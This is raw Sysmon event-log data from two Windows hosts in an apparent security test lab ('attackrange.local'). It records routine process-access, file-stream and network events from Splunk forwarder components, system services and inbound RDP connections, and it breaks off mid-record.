09:12:55.311{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050392Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:55.311{5EBD8912-7F2D-614D-0500-00000000FC01}408368C:\Windows\system32\csrss.exe{5EBD8912-8B17-6151-3E7A-00000000FC01}4112C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050391Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:55.311{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8B17-6151-3E7A-00000000FC01}4112C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001050390Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:55.290{5EBD8912-8B17-6151-3E7A-00000000FC01}4112C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000979062Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:56.541{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=77BC4AEECE79B8CEF6E233571D5B2280,SHA256=D8064E8ED8F3C1EF7B230DA6981E29A1E6786B90C4C4886B6DEBBF138FF330FB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979061Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:56.541{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4A0BDB33CC35947F4F845137F0A9D26F,SHA256=D358DC110864B82892AC25AE4384D31DEDFA9F35EAC6F6510DAA5568D29B8229,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979060Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:56.260{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C1751BE31F56C768C2DFB9D867959977,SHA256=B199849BEFDD2EEED06C9D5D783021F0B6B207653324A5EF6C529E7BBAC9D63C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050410Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:56.327{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B2033D32F8D0B3922BB1CD661D2A98D7,SHA256=460A6C0406533AD51734C7B4E2DC1E2C4A0B5A093BB2B13DA04DFCA10580A49B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001050409Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:56.195{5EBD8912-8B17-6151-3F7A-00000000FC01}51484476C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000979059Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:52.730{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59397-false10.0.1.12-8000- 23542300x80000000000000001050411Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:57.110{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FEAABC71DC2A90E3C96B2D98AEF34F0A,SHA256=9A44F75664508A2F17ED2CBA8F9ED7C1569839379D2063D63D34D317011298DE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979063Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:57.260{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4C7BD2402FE9EC1DBD2039C95E02E9E0,SHA256=FCC8C8503DAF6DFE6C1FC2EB9E2347DB95893C73E5D5486530617D8D2AAAF5F9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979065Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:58.276{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D8E7AE3A91D5553AD7CBB1E3112C62A8,SHA256=FA6EDE028A569B7A818F4C8C1E5F7F2E8E002D93C2C6FCAE12E100416E74B045,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050412Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:58.241{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2480E1FAFEBA6734BF69F5C5B974E8C9,SHA256=BAE6E5FBA8AAD41EFD0EB6815858B856CE63AE2EB1357D146D5DEC93AE62AF45,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000979064Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:53.797{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-59288-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000979066Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:59.291{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B0AD76FDF962C058C6235D5A9E963EF9,SHA256=742F7530FF4C2C96ED86E7ECB3C90438963658624B3330131238985A376AAD7C,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050415Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:57.530{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-60881-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001050414Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:59.272{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3F4E4EE040495334A997345815BEC54A,SHA256=E322234A96C07D9E769368038A1E7EC2416E457F12D3D11F98577693E267A2BD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001050413Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:59.041{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000979067Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:00.385{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8A2D10CDC27B4E53608359F7100241F0,SHA256=4E3887E5C69901749C67E202E082C2044FA0E69C3553B4CD6E3C1E94C4566A3C,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050448Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:58.875{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-61763-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 354300x80000000000000001050447Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:58.732{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53381-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x80000000000000001050446Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:00.572{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79CC-6151-F677-00000000FC01}4344C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050445Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:00.572{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79CC-6151-F677-00000000FC01}4344C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050444Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:00.572{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79CC-6151-F677-00000000FC01}4344C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050443Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:00.572{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79CB-6151-F577-00000000FC01}2124C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050442Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:00.572{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79CB-6151-F577-00000000FC01}2124C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050441Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:00.572{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79CB-6151-F577-00000000FC01}2124C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050440Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:00.572{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79CB-6151-F577-00000000FC01}2124C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050439Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:00.572{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79CB-6151-F577-00000000FC01}2124C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050438Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:00.572{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79CB-6151-F577-00000000FC01}2124C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050437Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:00.572{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79CB-6151-F577-00000000FC01}2124C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050436Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:00.572{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79CB-6151-F577-00000000FC01}2124C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050435Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:00.572{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050434Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:00.572{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050433Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:00.572{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050432Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:00.572{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050431Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:00.572{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050430Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 